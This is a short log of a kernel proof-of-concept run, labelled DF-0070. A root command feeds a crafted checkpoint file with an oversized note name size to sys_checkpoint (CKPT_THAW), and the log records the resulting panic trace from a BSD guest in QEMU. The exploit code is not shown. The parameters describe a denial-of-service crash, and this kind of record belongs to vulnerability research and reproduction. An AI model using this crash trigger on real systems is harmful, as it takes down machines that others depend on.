=== DF-0070 run.2.log (panic mode, RUN 1 -- first observation, pre-reset) ===
Guest: same kernel, same snapshot.
Caller: root.

Command:
    cd /tmp/df70 && /bin/sh -c "(./df0070 evil.ckpt) 2>&1; echo RUN_EXIT=$?"

$ ./df0070 evil.ckpt
[*] DF-0070 PoC: building evil.ckpt  (notesz=880, n_namesz=0x10000000, n_descsz=120, mode=panic)
[*] calling sys_checkpoint(CKPT_THAW, fd=3, pid=-1, retval=0) [syscall #467]...
<shell tool terminated command after exceeding timeout 120000 ms>
<ssh session gone: guest panicked>

Panic signature (RUN 1) from dfbsd-qemu/boot.log:
    panic: assertion "obj != NULL" failed in vm_object_hold_shared at /usr/src/sys/vm/vm_object.c:330
    cpuid = 0
    Trace beginning at frame 0xfffff800ab88b338
    vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf 
    vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf 
    vm_fault() at vm_fault+0x408 0xffffffff8099d7c8 
    trap_pfault() at trap_pfault+0x9a 0xffffffff80bd49da 
    trap() at trap+0x17c 0xffffffff80bd52dc 
    calltrap() at calltrap+0x9 0xffffffff80b9890a 
    --- trap 000000000000000c, rip = ffffffff80bca038, rsp = fffff800ab88b750, rbp = fffff800ab88b7b8 ---
    memmove() at memmove+0x28 0xffffffff80bca038 
    Debugger("panic")

    CPU0 stopping CPUs: 0x00000002
     stopped
    Stopped at      Debugger+0x7c:  movb    $0,0xbd77f9(%rip)
    db> 

RUN 1 vs RUN 2 code offsets are byte-identical; only frame addresses differ
(KVM randomisation between boots).
